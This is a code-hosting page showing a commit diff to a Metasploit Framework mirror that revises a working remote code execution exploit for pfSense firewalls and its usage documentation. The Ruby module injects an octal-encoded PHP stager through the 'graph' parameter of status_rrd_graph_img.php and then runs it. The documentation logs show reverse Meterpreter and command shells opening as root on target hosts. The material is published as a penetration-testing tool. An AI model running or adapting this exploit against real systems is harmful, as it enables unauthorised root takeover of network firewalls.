infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

requested changes

MS-2855/keylogger-mettle-extension
wetw0rk 2018-01-01 17:30:43 -06:00
parent bc088cb379
commit 8f0e41e159
2 changed files with 35 additions and 100 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

97
documentation/modules/exploit/unix/http/pfsense_graph_injection_exec.md
View File

@ -27,44 +27,22 @@
### pfSense Community Edition 2.2.6-RELEASE
```
msf exploit(unix/http/pfsense_graph_injection_exec) > options
msf exploit(unix/http/pfsense_graph_injection_exec) > use exploit/unix/http/pfsense_graph_injection_execmsf exploit(unix/http/pfsense_graph_injection_exec) > set RHOST 2.2.2.2
RHOST => 2.2.2.2
msf exploit(unix/http/pfsense_graph_injection_exec) > set LHOST 1.1.1.1
LHOST => 1.1.1.1
msf exploit(unix/http/pfsense_graph_injection_exec) > exploit
Module options (exploit/unix/http/pfsense_graph_injection_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD pfsense yes Password to login with
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOST 192.168.75.132 yes The target address
RPORT 443 yes The target port (TCP)
SSL true no Negotiate SSL/TLS for outgoing connections
USERNAME admin yes User to login with
VHOST no HTTP server virtual host
Payload options (php/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.75.128 yes The listen address
LPORT 80 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic Target
msf exploit(unix/http/pfsense_graph_injection_exec) > exploit
[*] Started reverse TCP handler on 192.168.75.128:80
[*] Started reverse TCP handler on 1.1.1.1:4444
[*] Detected pfSense 2.2.6-RELEASE, uploading intial payload
[*] Triggering the payload, root shell incoming...
[*] Sending stage (37543 bytes) to 192.168.75.132
[*] Meterpreter session 1 opened (192.168.75.128:80 -> 192.168.75.132:34381) at 2018-01-01 02:07:03 -0600
[*] Payload uploaded successfully, executing
[*] Sending stage (37543 bytes) to 2.2.2.2
[*] Meterpreter session 1 opened (1.1.1.1:4444 -> 2.2.2.2:42116) at 2018-01-01 17:17:36 -0600
meterpreter > sysinfo
Computer : pfSense.localdomain
OS : FreeBSD pfSense.localdomain 10.1-RELEASE-p25 FreeBSD 10.1-RELEASE-p25 #0 c39b63e(releng/10.1)-dirty: Mon Dec 21 15:20:13 CST 2015 root@pfs22-amd64-builder:/usr/obj.RELENG_2_2.amd64/usr/pfSensesrc/src.RELENG_2_2/sys/pfSense_SMP.10 amd64
Meterpreter : php/freebsd
meterpreter > getuid
Server username: root (0)
meterpreter >
@ -73,45 +51,20 @@ meterpreter >
### pfSense Community Edition 2.1.3-RELEASE
```
msf exploit(unix/http/pfsense_graph_injection_exec) > options
Module options (exploit/unix/http/pfsense_graph_injection_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD pfsense yes Password to login with
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOST 192.168.75.131 yes The target address
RPORT 443 yes The target port (TCP)
SSL true no Negotiate SSL/TLS for outgoing connections
USERNAME admin yes User to login with
VHOST no HTTP server virtual host
Payload options (php/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.75.128 yes The listen address
LPORT 80 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic Target
msf > use exploit/unix/http/pfsense_graph_injection_exec
msf exploit(unix/http/pfsense_graph_injection_exec) > set RHOST 2.2.2.2
RHOST => 2.2.2.2
msf exploit(unix/http/pfsense_graph_injection_exec) > set LHOST 1.1.1.1
LHOST => 1.1.1.1
msf exploit(unix/http/pfsense_graph_injection_exec) > set PAYLOAD php/reverse_php
PAYLOAD => php/reverse_php
msf exploit(unix/http/pfsense_graph_injection_exec) > exploit
[*] Started reverse TCP handler on 192.168.75.128:80
[*] Started reverse TCP handler on 1.1.1.1:4444
[*] Detected pfSense 2.1.3-RELEASE, uploading intial payload
[*] Triggering the payload, root shell incoming...
[*] Sending stage (37543 bytes) to 192.168.75.131
[*] Meterpreter session 1 opened (192.168.75.128:80 -> 192.168.75.131:45257) at 2018-01-01 01:03:05 -0600
[*] Payload uploaded successfully, executing
[*] Command shell session 1 opened (1.1.1.1:4444 -> 2.2.2.2:3454) at 2018-01-01 15:49:38 -0600
uname -a
meterpreter > getuid
Server username: root (0)
meterpreter >
FreeBSD pfSense.localdomain 8.3-RELEASE-p16 FreeBSD 8.3-RELEASE-p16 #0: Thu May 1 16:19:14 EDT 2014 root@pf2_1_1_amd64.pfsense.org:/usr/obj.amd64/usr/pfSensesrc/src/sys/pfSense_SMP.8 amd64
```

38
modules/exploits/unix/http/pfsense_graph_injection_exec.rb
View File

@ -40,7 +40,6 @@ class MetasploitModule < Msf::Exploit::Remote
'Encoder' => 'php/base64',
'PAYLOAD' => 'php/meterpreter/reverse_tcp',
},
'DisclosureDate' => 'Apr 18, 2016',
'Platform' => 'php',
'Arch' => ARCH_PHP,
@ -108,7 +107,7 @@ class MetasploitModule < Msf::Exploit::Remote
end
# If the device isn't fully setup, you get stuck at redirects to wizard.php
# however, this does NOT stop exploitation strangely
print_error("pfSense version not detected or wizard still enabled.")
print_error('pfSense version not detected or wizard still enabled.')
Gem::Version.new('0.0')
end
@ -116,10 +115,10 @@ class MetasploitModule < Msf::Exploit::Remote
begin
cookie = login
version = detect_version(cookie)
filename = rand_text_alpha(rand(20))
filename = rand_text_alpha(rand(10))
# generate the PHP meterpreter payload
stager = "echo \'<?php "
stager = 'echo \'<?php '
stager << payload.encode
stager << "?>\' > #{filename}"
# here we begin the encoding process to
@ -127,25 +126,16 @@ class MetasploitModule < Msf::Exploit::Remote
# don't look
complete_stage = ""
for i in 0..(stager.length()-1)
if "#{version}" =~ /2.2/
complete_stage << "\\\\#{stager[i].ord.to_s(8)}"
else
complete_stage << "\\#{stager[i].ord.to_s(8)}"
if version.to_s =~ /2.2/
complete_stage << '\\'
end
complete_stage << "\\#{stager[i].ord.to_s(8)}"
end
res = send_request_cgi(
'uri' => '/status_rrd_graph_img.php',
'method' => 'GET',
'headers' => {
'User-Agent' => 'Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0',
'Accept' => '*/*',
'Accept-Language' => 'en-US,en;q=0.5',
'Accept-Encoding' => 'gzip, deflate',
'Origin' => 'null',
'Cookie' => cookie,
'Connection' => 'close',
},
'cookie' => cookie,
'vars_get' => {
'database' => '-throughput.rrd',
'graph' => "file|printf '#{complete_stage}'|sh|echo",
@ -153,23 +143,15 @@ class MetasploitModule < Msf::Exploit::Remote
)
if res && res.code == 200
print_status("Triggering the payload, root shell incoming...")
print_status('Payload uploaded successfully, executing')
else
print_error("Failed to upload the initial payload...")
print_error('Failed to upload payload...')
end
res = send_request_cgi({
'uri' => '/status_rrd_graph_img.php',
'method' => 'GET',
'headers' => {
'User-Agent' => 'Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0',
'Accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Language' => 'en-US,en;q=0.5',
'Accept-Encoding' => 'gzip, deflate',
'Cookie' => cookie,
'Connection' => 'close',
'Upgrade-Insecure-Requests' => '1',
},
'cookie' => cookie,
'vars_get' => {
'database' => '-throughput.rrd',
'graph' => "file|php #{filename}|echo "